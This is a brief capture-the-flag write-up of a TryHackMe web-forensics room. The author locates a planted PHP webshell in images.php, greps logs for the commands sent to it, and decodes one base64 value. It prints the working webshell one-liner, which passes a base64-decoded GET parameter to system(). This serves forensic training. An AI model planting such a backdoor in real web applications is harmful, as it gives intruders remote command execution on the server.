TryHackMe · 2026-07-01 · 1 min read
Infinity Shell
TryHackMe webshell forensics room investigating a PHP implant, tracing attacker query strings, and decoding a base64 payload to recover the flag.
CTF Room: Infinity Shell
- Link to room
- Difficulty: Easy
- Category: Web Forensics, Webshell Analysis, Log Analysis
- OS: Linux
1. Brief
Infinity Shell is a TryHackMe forensics room focused on tracing activity from an implanted webshell.
The prompt mentioned a compromised web application, so I started with the common web root and looked for suspicious uploaded PHP content.
2. Web Root Review
I moved into the web directory and found the application folder.
Commands
cd /var/www/html
ls -la
cd CMSsite-masterSince webshells are often disguised as normal-looking PHP files, I started inspecting PHP files in the application directory.
3. Webshell Discovery
The suspicious file was images.php.
Command
strings images.phpOutput
<?php system(base64_decode($_GET['query'])); ?>This is a simple PHP webshell. It takes the query GET parameter, base64-decodes it, and passes the decoded value into system().
4. Tracing Webshell Usage
To find commands passed to the webshell, I searched for references to images.php and the query parameter.
Commands
cat * | grep images.php
cat * | grep queryOne base64 value stood out:
Decoding that value produced an echo command containing the flag.
Decoded Command
echo ''5. Flag
What is the flag?
Answer
6. Summary
The attack used a lightweight PHP webshell in images.php.
The implant executed commands from the base64-decoded query parameter. Searching for previous query values revealed a suspicious base64 string, which decoded to an echo command containing the flag.